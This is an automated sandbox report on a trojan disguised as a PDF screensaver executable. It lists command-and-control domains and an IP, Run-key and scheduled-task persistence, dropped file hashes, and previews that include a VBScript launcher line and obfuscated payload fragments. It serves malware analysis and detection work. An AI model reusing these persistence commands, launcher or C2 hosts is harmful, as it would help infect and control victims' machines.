      NameMaliciousAntivirus DetectionReputation
      december2nd.ddns.nettrue
      • 12%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown
      december2n.duckdns.orgtrue
      • 6%, Virustotal, Browse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.autoitscript.com/autoit3/026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
          		high

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          212.193.30.230
          		december2nd.ddns.netRussian Federation
          		57844SPD-NETTRtrue

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:796783
          Start date and time:2023-02-02 08:08:12 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 13m 40s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:32
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:026910003102350.pdf.scr.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@43/44@4/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 99.7% (good quality ratio 92.3%)
          • Quality average: 78.7%
          • Quality standard deviation: 29.6%
          HCA Information:
          • Successful, ratio: 99%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          08:10:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:10:13AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          08:10:14Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
          08:10:14API Interceptor602x Sleep call for process: RegSvcs.exe modified
          08:10:15Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
          08:10:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          08:10:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:10:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
          08:10:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          08:11:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

          Download File
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):45152
          Entropy (8bit):6.149629800481177
          Encrypted:false
          SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
          MD5:2867A3817C9245F7CF518524DFD18F28
          SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
          SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
          SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

          Download File
          Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):142
          Entropy (8bit):5.090621108356562
          Encrypted:false
          SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
          MD5:8C0458BB9EA02D50565175E38D577E35
          SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
          SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
          SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
          Malicious:false
          Reputation:unknown
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log

          Download File
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):142
          Entropy (8bit):5.090621108356562
          Encrypted:false
          SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
          MD5:8C0458BB9EA02D50565175E38D577E35
          SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
          SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
          SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
          Malicious:false
          Reputation:unknown
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

          C:\Users\user\AppData\Local\Temp\Folder8_410\Update.vbs

          Download File
          Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):143
          Entropy (8bit):4.963345814111803
          Encrypted:false
          SSDEEP:3:FER/n0eFH5OUkh4E2J5xAIzbgFCdSfNUkh4E2J5xAIzbgbi1A:FER/lFHI923fzbgFeSfN923fzbgb7
          MD5:C3DAE34C95AFBA3A4E22F956B6761EF7
          SHA1:8DD9C50F51E1D8FA7492922AE3E05C8526824D88
          SHA-256:60DFA2FD6C51979E9A3E669F487471408474A5ABB43FFFF5536160401FB0712F
          SHA-512:987681FF2FC61676FE4FDFCBB748740BED5FC64AE9C7087D4D2EB0F492891ABDCBCD34CE2ADBBD50CCB390E098D867C0CE8B1CB4A10C7DD26AB6F1CFF58C821E
          Malicious:false
          Reputation:unknown
          Preview:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls"

          C:\Users\user\AppData\Local\Temp\Folder8_410\accdciolx.icm

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):597
          Entropy (8bit):6.186253247413455
          Encrypted:false
          SSDEEP:12:oXEXUz6MlWRGKb57dGZ47amIGP115oCnWRi8UVEpmyvLSoK/:OEXU+71dGG7apGRoYWRizVimyJg
          MD5:9D23B8A8A8DC43EC163438D3E58CDB4E
          SHA1:083823FFA163D66242EC8E04AD9C9A02A3F5F32E
          SHA-256:D249EC95400898681404C2D824E77651C8D8ACFFEBE92F51BC6D337DF11DB895
          SHA-512:ABA25C811AC517981F7F68F803B205E326B89F390E4E4208FE0CA51312EA15F403468C88EBC3C64EDCF8447E377012FCBA100D0BCB04A3BC861FCE041B7EE6D6
          Malicious:false
          Reputation:unknown
          Preview:............................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\adietmenbj.mp3

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):503
          Entropy (8bit):6.217480782110286
          Encrypted:false
          SSDEEP:12:BRE/nyLFn4WfUw7LT6aZXxGOAl54d3JcfZCMJL+VUftgAeryz/:n0YdRlFZwvlUJcfZL+VVqr
          MD5:2732EEA4B454A9C18455717D791AA346
          SHA1:6E3F73A1A0ADEA9FDBAE17F9E0208D6AD08B05EC
          SHA-256:64E99289977F284CE1C930F9E27A813C60C4F379E3E38F845E4EF11703ADE375
          SHA-512:69ADE759606DAF638525F6DACBAD04CD8CCCF724F2D1768CA5B3F16545F937D62B28DA738510BA78FBA83A7190DFAF80A1E19914A027DAFDBFDDEAD655F67FCC
          Malicious:false
          Reputation:unknown
          Preview:.................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\cgkjjhlj.icm

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):528
          Entropy (8bit):6.181783102675102
          Encrypted:false
          SSDEEP:12:AjJFkEaE4BuYCDwUEY7Yn6eb0yVIHmMY7EC0LuHvZ2ItWDNEpKnFg0T:AjJDZ4BSDwURYn6eb0yVIlIvMqEFv
          MD5:B999711E1C647771E59A27D40F75E908
          SHA1:E1DBE34813EF6241B4B227042649805372321794
          SHA-256:6A9A2E454761426D0B07209E1958C520D008D8EFAABB12CFAFE777C15B0FA562
          SHA-512:7A5783199BB73E284E56A3D4D26268DABC6D1973562D91D4253D3EDA9EBD483F89F9D2545146CDE4935FAFF70F981B5B617CDA7B3A25E769C0C9E44BFCE6B876
          Malicious:false
          Reputation:unknown
          Preview:......................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\chcekckp.gfh

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):407473
          Entropy (8bit):4.048588207938584
          Encrypted:false
          SSDEEP:3072:/JGA8gDqUGMl95jTDOWmA72KRvgr00mvlIRHqsEZipg7O65J48al5plklct4wyNu:h5VGMBJRvgr09nZiq7OIy8az0a4DuP
          MD5:48F9952AAAFE4CA15D39581E78889AC0
          SHA1:569F6FB010FEFB412192A968784DB355B8311853
          SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
          SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
          Malicious:false
          Reputation:unknown
          Preview:0x4D5*9--3---04---FFFF--_8-------4-----------------------------------08----E/F_*0E-_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24-------5045--4C0/03-*/27E954--------E--E0/0_0/06--C80/--7E0/-----92E70/--2-----2---4--02----2--04-------04--------*-3--02------02-----/--0/----0/--0/------0/-----------038E70/-57----2-2-787*0/-------------------02-0C----------------------------------------------------2---8-----------082--048-----------2E74657874---98C70/--2---0C80/--02--------------2--0602E72656C6F63--0C-----02--02---C*0/-------------4--0422E72737263---787*0/--2-2--7C0/--CC0/-------------4--04----------------074E70/-----48---02-05-E4D6--54/-/-03---CE0/-06CCC4--/8/2------------------------------------------/33-3-5/---0/--//026F35--0*/82E02/62*026F36--0*/E2D0*2606/69//F0*2E332_030*2_F406/69/20*C---330E06/79//F0F3/0706/79//F2032/606/69/20C---0330*06/79/20*8---2E02/62*/72*---033-9-45-------7337--0*/92D28267338--0*/72D26267339--0*/62C242673

          C:\Users\user\AppData\Local\Temp\Folder8_410\daitsfsh-waune.icm.vbe

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):62820
          Entropy (8bit):6.7478449446190245
          Encrypted:false
          SSDEEP:768:EaauGtmxdbAYaauGtmxdbAXaauGtmxdbAbaauGtmxdbAXaauGtmxdbA9aauGtmxt:NqJ5qJOqJ6qJOqJYqJ7qJrqJ/qJ5
          MD5:F96269E1056B12E82772B66B0884F8A6
          SHA1:C4D4F2D680A1A95B3FE3462A0F2CF80DC5DD8B05
          SHA-256:2A8C2D73D15B644CFCB109F61099B5501C706CD539D885C3929E35F636A886B8
          SHA-512:4A38D9B82454101EC0BAFE7EA472BCDC457724377F6B4277B7BBBEAE362B402C9012B17F0613B46817F5BF80355E005A01A57A6FE85E6EDF7AB90BF654572596
          Malicious:false
          Reputation:unknown
          Preview:..'..XU}.}...M......h..)..J...<.]W....C.!..X8:.........'.I.9.0.j.t.6.t.t.6.0.5.1.M.K.7.C.8.7.R.Z.b.z.1.9.5.w.K.8.2.6.2.p.Q.6.9.Z.C.8.5.R.t.8.5.f.....'...!?<.k{.N.3.&g.Q}.S..MS..z.....{.(.5F.9E..vsW...M......'..b.WqRj..8a..PCd...~c..)o.>.?3...._[Rx..Pb.<I...g..F!.x.O..p.rC..S.l~.9M...*^rD=..8x..h..h..8..9..P....'.w.c.b.o.6.t.e.u.K.2.6.5.Z.X.1.w.O.W.3.8.B.t.d.4.E.a.w.1.8.3.V.1.4.3.8.Y.t.0.7.a.6.1.....'.9.Z.0.4.2.8.6.6.s.3.y.T.1.8.R.Z.0.A.e.t.0.X.R.v.4.i.l.1.j.Z.3.v.r.l.L.0.l.5.Q.8.d.....'.X.9.y.T.5.J.k.0.0.5.l.1.7.R.V.x.7.1.6.c.6.6.8.3.Q.y.m.E.u.6.K.2.a.2.h.7.4.6.1.7.6.E.5.x.O.7.....'.J.V.n.3.9.1.Q.I.4.....'.i.4.4.6.2.W.s.6.7.5.r.0.3.9.4.I.9.f.M.7.M.e.9.7.b.A.5.....'.?.z...!]D...Z.l@.^<..z.so...S...w.:...Jc.wP.....Mm.}.VT.~.....'...3......c...)Q.zK...D.X.C..3-....w..H0M.hL..(P...~........\c.5>.B.a.,.&.n.....&..l$3K......Xz...Iq.+U.....E.|.z...i..F#.[M..../\.r}.ZR^.)....c= ..x....'.9.E.7.5.7.p.N.V.0.1.J.6.2.4.a.r.5.....'........)...C.b./..d....Z..c.........'.e^,...

          C:\Users\user\AppData\Local\Temp\Folder8_410\dbhplsxd.msc

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):539
          Entropy (8bit):6.237962640598812
          Encrypted:false
          SSDEEP:12:6Dap/0JWG75MfHN4BgfCct6W/9TM3GoUDAPt4RV:6aEWD7dkI96GNDAPt4RV
          MD5:E96279C4B834A0D1348BA98595380443
          SHA1:B6857B68DE2711C498632D7FAE63702F800B29A0
          SHA-256:E9BC070312838661A856486A6D4433C46AB42AD7C18FA0D0D56943838B44F125
          SHA-512:F267F094F2F39B2225238FB02EB1CB99EB176D6F9DC380F75CF59439D0DF6229DD5F3987377BB23D3424C92288DE86D835605CA0EA0162B4EEB2441259119A71
          Malicious:false
          Reputation:unknown
          Preview:..........................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\dldgexp.dll

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):514
          Entropy (8bit):6.218187584585582
          Encrypted:false
          SSDEEP:12:B/ZQ2hmQ7kCAxtYCU2QXbx0VgIrrkUC7GDAIh7mJbHz+t:B58DbLexFIV4GD3tmpSt
          MD5:06FEEDE36DB05B3D230E3081419A19A2
          SHA1:2D69F4B7F32BB925AA0CE16208F36BF5FE052F19
          SHA-256:76C4B7C04D21D13CA2B8344485033B11A3631C04F9F3F0EF55C466A443EBBEAD
          SHA-512:770031C2511B3A3E41CC0C0906927D5878B797A8FC5CDE7E33D725AC46934DA573F5D19C13C53C11BB1C626FED611ED2F87A377890863DD06F25ABDCA540B5A6
          Malicious:false
          Reputation:unknown
          Preview:................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\fedenpfm.xml

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):744
          Entropy (8bit):6.252068466825267
          Encrypted:false
          SSDEEP:12:pMzbyFRPpIHRufJX36MPoeyUTPg1vOlZvapSJYzD7xsgvj3IOeEwvnbkSkAQFQov:mzbyFHieJH6rtlmzapSJ47xX7DA/mJ9v
          MD5:5068F342795DD0ABC182D3E210DEA3DC
          SHA1:D19EF854A23175FB29C2E4477DD9FEBAACD7F113
          SHA-256:1938E80FD584E5F0AEA8FB71CEC826411B8E69F8541EAE8C820315462A9053B3
          SHA-512:BECF5BF96FBEF2F4809E62DF6DC7B3640ACBE2AE76CADA9E912BE9ABFE02F394C694D864318699B6AFF1CAE3A7B597A1929F7AB5C4D630127DEB7A0F7F070600
          Malicious:false
          Reputation:unknown
          Preview:................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\gfgrxolm.dat

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):698
          Entropy (8bit):6.258683715544326
          Encrypted:false
          SSDEEP:12:VD+CEZtzDSITZIvJD7zmPAa0U5O6sr2mXd6GhVYNTx9+LiKyjfftWBdd:ArfScIvJ3SPP5O6s8GhsT3+LyLtsd
          MD5:DBC9AC22BDEEB8CD96BBAECD453652C1
          SHA1:089BD73581553744ADBA703B7254B0238C8C3E30
          SHA-256:1F9293BE18FEB28F2FB505E0C14660FD0CE8930A5FB8644EB908F187643C9C07
          SHA-512:BFD581BDE6C31E4F67EC5A1302F4B80756979A468B2C13DF24B67041D31B8D4DB9006598DACEF5B299D0A6DC1E809EF6AE7A99176E313E756DF89C0013EEE574
          Malicious:false
          Reputation:unknown
          Preview:.................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\gvcjf.ppt

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):624
          Entropy (8bit):6.242263123832009
          Encrypted:false
          SSDEEP:12:ZgDtdbmShRjjA6D1IDDjUzIDZMo1S5Rn21D5akY/B15v:eDtdiSvjbGUUDZH1S5BUlcjx
          MD5:C516FA4A75BF057057BE211416395C0F
          SHA1:04E8F9798E788912ED41BEC8BBB0DF98662D5271
          SHA-256:D897EE20C42EE8D2DC2E1950F12FB254C62931DBC840D971FF26E45967045771
          SHA-512:69D91E298BC4619AEBADDEBFACAFA49BE66C1182F28CC91D83E98702B4E3213458A0A83B9DA15AB5B521EAFEA3CE07983A0185BB7A3B867BDB310E4713D78594
          Malicious:false
          Reputation:unknown
          Preview:.......................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\gvguxlvv.xls

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):523
          Entropy (8bit):6.198216479466076
          Encrypted:false
          SSDEEP:12:15QbzLiR3mkusiHTHvYHC5qMXzyOWPz/wZdOyGhKPw/PcherOa:LQW3mQkAi5qOGyCEmchED
          MD5:DCC586BBC725E3FFB47CADEE31309C8E
          SHA1:D3630384B5A6D579453AB671607F8E51AE9C8CDA
          SHA-256:6B9C0567140D3565DD3B1D56C6B18E424DD6C1E0AE2F3DB521F234B9F108EE16
          SHA-512:05A5CA6133D7558B3F95278C01084540CEDE28BE9B34DB1AF0D4DA14EC8615EBA57D4A46CA272D94A95052CC471077421D6B3ED01DC879FA6E2FB34726DE92A2
          Malicious:false
          Reputation:unknown
          Preview:.....................................................................T...............................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):936754
          Entropy (8bit):6.601305917045285
          Encrypted:false
          SSDEEP:24576:cYgAon+KfqNbXD2XJ2PH1ddATgs/u2karPK:c37+KSbq5e1diEnHam
          MD5:8A57722EC9067FAAA9FF2980C5F02838
          SHA1:F528308591C99004567DD76123E6D241ECDB5817
          SHA-256:3097D4413844FA305E10FB19DA3086848F2F3715B5B877E2F8691997BC25CD25
          SHA-512:27DFCA42250C1A0959023E9EB586CFE69BDA8166E5DE7C775370C30620D0E5E3515EBB85CC75AD57E7DBD65AE1612DD29CFD520B12BE64CD5C6EAE677A06A5AC
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 46%
          Reputation:unknown
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."..........~....................@..........................p.......P....@...@.......@.........................|....P..................X&......Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........P......................@..@.reloc..Pv.......x..................@..B................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\kulqol.dat

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):537
          Entropy (8bit):6.2210381148806615
          Encrypted:false
          SSDEEP:12:cMSRrTZ3kkt6JJy9Lidiius2n4Hoboa5hPb1K9rL3XMd+Y1:cMSRrV3T/xiT64uoOjgtL3XM84
          MD5:DECFF247A10D1AB7F53AA5D798ECA2F7
          SHA1:E5DB2B53CB14488EC5EDD81D7CDE5FA53A11E837
          SHA-256:AC3428221792D658F6690BAB568201DB966D220EBB29E3426877941810DA4A96
          SHA-512:34272C48FFDA25F4C05CF0DF5FFA56D7B99EF09E4A2C2468739BA03C93D4EF171A1CE56E33C0E3CAD791E67E5079F6B5BCAD5E683B74FD615E60CF34CC02B0CD
          Malicious:false
          Reputation:unknown
          Preview:.........................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.ini

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):506
          Entropy (8bit):6.2100184686076965
          Encrypted:false
          SSDEEP:12:04/uII8/4p0YqXRhMeXVfbpc6HumsDS1cAuzj:5GD8/4p0YARaexp7umoSI
          MD5:0F4EF68A2745715CF4B89D383968D0EB
          SHA1:50D039BF131F5F11EC21E7EEBF7E22B81937C0A5
          SHA-256:173AA7C8B7671410C3F73767A1DFE2711403B3F045DBF9825BDB115BF13B2D8F
          SHA-512:2DC45A2B0BA4E58486B6BF128D7C91B00B732A1A2BBBB4CC90369E70DF7A654350FC2854E99B0DEA9B53ADDF2EE68BB97AB4F278247A4F3C486F43710950A226
          Malicious:false
          Reputation:unknown
          Preview:...............................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\ldgreqiiqi.msc

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):524
          Entropy (8bit):6.220072157041624
          Encrypted:false
          SSDEEP:12:IB7l5Fye8aehibvAui24ti7a/7skAywESg:IxcFb8obh3skA/Et
          MD5:DDAA651BD0ED9660CE485161F3DA0A31
          SHA1:F209147B7A434D9FF63997C57634694DD51E70C5
          SHA-256:6688EA36289339B7E8ABC74401F8338F14C7B824BEA4C56ACDEAE1082228B693
          SHA-512:966681795DF387F155F8D27D61AA4917E30F4A49E28B375700FBBBCA2F02AB45E5970891327795A0892B7466B412CEC537177D125251D983AA53A460176BBE05
          Malicious:false
          Reputation:unknown
          Preview:.................................................................................W...................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\lhtfibp.docx

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):515
          Entropy (8bit):6.204575666587385
          Encrypted:false
          SSDEEP:12:4r0qRbHsWBKiUtlBQ9+6t5pAaFJukpJ5Hx+pWpZe30ANx:4rRHsWUiIobppz3pR+pWve30A3
          MD5:C43B0D8E855F60BC8988C239AE91430E
          SHA1:38A9CC908239A6174A8C6CDD07DF2E65ED03C557
          SHA-256:F63FD422159E07439272BB6B603C3EB696C785AED53DBB0C693F9A9343869B89
          SHA-512:A7889E83FDA300933D47A34FA927EC0059BDFB518707DF227C157A82320A6E28189B8F88803DF45CE1C0FE6080E89FE034D84F8F1F7E0D044C4FCDE181AB59DE
          Malicious:false
          Reputation:unknown
          Preview:.................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\lulajc.bmp

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:Unicode text, UTF-8 text, with CRLF line terminators
          Category:dropped
          Size (bytes):664
          Entropy (8bit):6.212535146320597
          Encrypted:false
          SSDEEP:12:uuIc8nn8GGMe+xg0IKcrRR6Th9dZ73G/jaPCOtQwPGtMRZAV1uav:uuIc8V0+xgFvzm9dF3G/GVpY1t
          MD5:165255E5120FD4986C2B288F9FCAB09F
          SHA1:8CB0C248BB9A4BA714EA6739C74C1DE960BC7343
          SHA-256:CD7EC8254B748B3FE738147E27DF2FD3F7643D02835A46B15E93ECD060D06581
          SHA-512:AF748CC3EE4BA6747ABA50BE8AE6D568B7E913BBB33678C2E1116B4AA9AB14F7AB5860922223E62B3E6D9D3F72D81AE773D73EF3FE0CC0BA4069261E45280C26
          Malicious:false
          Reputation:unknown
          Preview:...................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\Folder8_410\lvgkma.msc

          Download File
          Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):36396
          Entropy (8bit):5.572411470115854
          Encrypted:false
          SSDEEP:768:JF/d5vD40//MnSKd5+GcpEl51vx6q91kB6S9nxIBAIU9Fd9jVvAyAg3thc:HPLQdYpElIqHkB6SsBDylaLg9hc
          MD5:3016649ED3E9A031DA118886A15144F7
          SHA1:58913D264B171A708F3AB825B14C096E47112677
          SHA-256:429880966442E56D685B62933A30BB780092C5B664C7E546AEA2B3CAB49945CE
          SHA-512:6C8EFD796609CDE371A5FA01B579742CF877CC1C604B933C09F52FB01D501C16E84AB1ADAD121B43C65D1EB88FBA6F1528E832D51E8AF7360EC120EDB9E0D5EB
          Malicious:false
          Reputation:unknown
